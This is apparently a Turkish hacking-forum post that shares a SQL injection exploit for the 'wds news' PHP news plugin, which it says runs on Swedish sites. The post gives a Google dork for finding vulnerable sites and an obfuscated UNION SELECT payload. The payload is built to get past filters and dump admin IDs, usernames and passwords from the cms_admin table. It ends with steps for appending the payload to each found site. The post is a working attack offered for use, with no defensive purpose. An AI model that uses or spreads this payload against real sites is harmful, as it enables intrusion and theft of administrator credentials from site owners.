Merhaba SQL açığı ile wds news PHP haber eklentisinin açığı paylaşayım sadece isveç domain uzantılarında kullanılıyor sonuçlar az ama dursun çoğalır, atmak istemedim
Exploit Başlık;
Exploit Yazarı:
Exploit Dork;
Exploit Poc;
Kullanımı;
Dork kelimesi google ile aratılır exploit poc domain uzantısının sonuna eklenir
Örnek Kullanım;
site.se/[Exploit Poc]
Selam ve dua ile;
Exploit Başlık;
Wds News "Article" SQL İnjection
Exploit Yazarı:
HACKROOT
Exploit Dork;
inurl:wds_news
(Türetilebilir)Exploit Poc;
/wds_news/article.php?ID=-9694/*!UnioN*//*--*//*!alL*//*--*//*!SelEcT*/1,GRouP_cOnCat(0x3a,admin_id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10/*--*//*!FroM*/cms_admin
Kullanımı;
Dork kelimesi google ile aratılır exploit poc domain uzantısının sonuna eklenir
Örnek Kullanım;
site.se/[Exploit Poc]
Selam ve dua ile;